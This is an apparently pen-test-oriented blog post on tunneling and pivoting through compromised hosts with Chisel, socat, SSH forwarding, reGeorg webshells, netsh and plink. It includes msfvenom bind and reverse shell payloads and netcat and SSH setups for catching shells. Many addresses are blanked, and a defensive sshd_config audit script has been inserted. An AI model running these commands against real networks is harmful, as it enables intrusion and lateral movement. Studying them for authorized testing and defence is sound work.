Pivoting techniques: Part 2

This post covers some useful tools and commands for tunneling and pivoting during pen tests.

Riya Jain
Dec 31, 2023

A few examples throughout the post cover a basic scenario given a set of IPs, with the attacker running Kali Linux; the map is shown below.

1) Chisel

A robust, OS-agnostic tool for building simple to complex tunnels. It uses a client-server model, and it's a great option if your target doesn't have SSH built in.

Launching the Chisel server; this example listens on port 5447.

chisel server --host -p 5447 --socks5 --reverse

Launching the Chisel client; this example connects back to Kali on port 5447 and opens port 2600 on Kali for proxychains.

./chisel_binary client R:2600:socks

In your proxychains config on Kali (jump to the end of the file in vim with :$), update the ProxyList entry to

socks5 2600

Now when using proxychains, your traffic will be piped through your client.

proxychains wget

2) Socat

There is a lot you can do with socat. This example forwards traffic between Kali and an internal target by using the intermediary/public-facing target as a proxy.

This payload listens on port 4991 for incoming connections. The bind shell will be executed on an internal, non-public target.

msfvenom -p windows/shell_bind_tcp LPORT=4991 -f exe > ib_4991.exe

Copy socat over to the intermediary target via scp and install it.

scp -r -i ssh-key /tmp/socat.rpm root@
yum install /tmp/socat.rpm

Now run socat. This will listen on its interface on port 8080, then forward any request hitting 8080 to the internal target on port 4991.

socat tcp-listen:8080,bind=,fork tcp:

Finally, on Kali use Netcat to connect to socat's listening host and port.

nc -nv 8080

3) SSH Tunnels

If SSH is commonplace in your target environment, you can build SSH tunnels to accomplish your goal without dropping any extra tools. With SSH you can set up dynamic port forwarding, forward specific ports, or use the -J switch to treat targets as jump hosts.

Dynamic Port Forwarding

Running this on your Kali machine and then using proxychains will proxy traffic through the SSH host on to additional targets. You'll need to set the socks port in the proxychains config to 2600, or whatever port you choose.

ssh -N -D 2600 root@

Remote Forwarding

Remote forwarding can be used to access internal resources (web servers, DBs, etc.) or to catch reverse shells. You'll need GatewayPorts yes in the intermediate/proxy machine's sshd config for this to work.
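As an added example (not part of the original post), here is a Python check a defender can run over a host's sshd_config to see whether it currently permits remote forwards of the kind described above. The sample config embedded in it is constructed for the demo, and treating '#' anywhere on a line as the start of a comment is a simplification.

```python
# Added example (not from the original post): audit an sshd_config for the
# directives that decide whether remote (-R) tunnels can be reached from other
# hosts. sshd keeps the FIRST occurrence of a directive and ignores later
# duplicates; directives under a "Match" block are reported separately.

# OpenSSH defaults used when the directive is absent from the file.
DEFAULTS = {
    "gatewayports": "no",          # remote forwards bind to loopback only
    "allowtcpforwarding": "yes",   # yes/all, no, local, remote
}

def effective_tunnel_settings(config_text: str) -> dict:
    """Return {"global": {directive: value}, "match": [(spec, directive, value)]}."""
    settings = dict(DEFAULTS)
    seen = set()
    overrides = []
    current_match = None           # None while still in the global section
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        parts = line.replace("=", " ", 1).split(None, 1)   # "Key value" or "Key=value"
        key = parts[0].lower()
        value = parts[1].strip().lower() if len(parts) > 1 else ""
        if key == "match":
            current_match = value
        elif key in DEFAULTS:
            if current_match is not None:
                overrides.append((current_match, key, value))
            elif key not in seen:  # first global occurrence wins
                settings[key] = value
                seen.add(key)
    return {"global": settings, "match": overrides}

def permits_remote_gateway(config_text: str) -> bool:
    """True if clients can create -R forwards reachable from other hosts."""
    g = effective_tunnel_settings(config_text)["global"]
    return (g["allowtcpforwarding"] in ("yes", "all", "remote")
            and g["gatewayports"] in ("yes", "clientspecified"))

# Constructed sample config (not from a real host) exercising the edge cases.
SAMPLE_SSHD_CONFIG = """\
GatewayPorts yes
GatewayPorts no          # ignored: sshd keeps the first occurrence
#AllowTcpForwarding no   # commented out, so the default (yes) applies
Match User webdeploy
    AllowTcpForwarding no
"""
```

Run it against a copied /etc/ssh/sshd_config to list which hosts in an environment would actually let a remote forward bind to a non-loopback address.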

Running from your attacking box, this example will SSH to and forward requests going to localhost:8081 onto

ssh -R 8081: root@

So after running this command, opening Firefox on Kali and going to http://localhost:8081 will display the contents of

The example below will SSH to, listen on port 4444, and forward to localhost on Kali, port 4447. This will catch a callback from a reverse shell on an internal target.

ssh -R root@

When setting up the reverse shell payload, you'll need to set the LHOST to and the port to 4444, then listen on Kali's localhost port 4447. Example below.

msfvenom -p windows/meterpreter_reverse_tcp LHOST= LPORT=4444

4) reGeorg

reGeorg functions as a sort of web-shell tunnel. It is useful if you have limited access to your intermediary/public-facing web server, or if you want your proxied traffic to blend into normal web traffic. It works as a client-server tool, and you'll need to use proxychains along with it.

The reGeorg client/webshell is written in a few different web languages. Once you drop the client webshell on the target, run the reGeorg Python script from your attacking box. This example assumes your proxychains config is set to port 2600.

python reGeorg.py -p 2600 -u

Now when you use proxychains, your traffic will be tunneled through over port 80.

5) Netsh

Netsh is a built-in Windows CLI binary which, amongst other things, can be used to port forward. This example listens on interface on port 5446 and forwards requests hitting 5446 on to port 5985.

netsh interface portproxy add v4tov4 listenport=5446 listenaddress= connectport=5985 connectaddress=

You can also use netsh to open ports on the Windows firewall, which you may need to do when you open one of these listening ports.

netsh advfirewall firewall add rule name=fwd dir=in action=allow proto

6) Plink

Plink.exe is a command-line binary based on PuTTY. It has capabilities similar to the other individual binaries discussed. You can use it as a simple SSH command-line client on Windows (if none is built in), and you can also use it to create local or reverse tunnels.

Run from the internal Windows box ( this creates a reverse tunnel on listening on all interfaces ( port 8181, then forwards anything that hits 8181 onto localhost (aka the .21 Windows box) port 80.

.\plink.exe -ssh -l root -pw toor -R
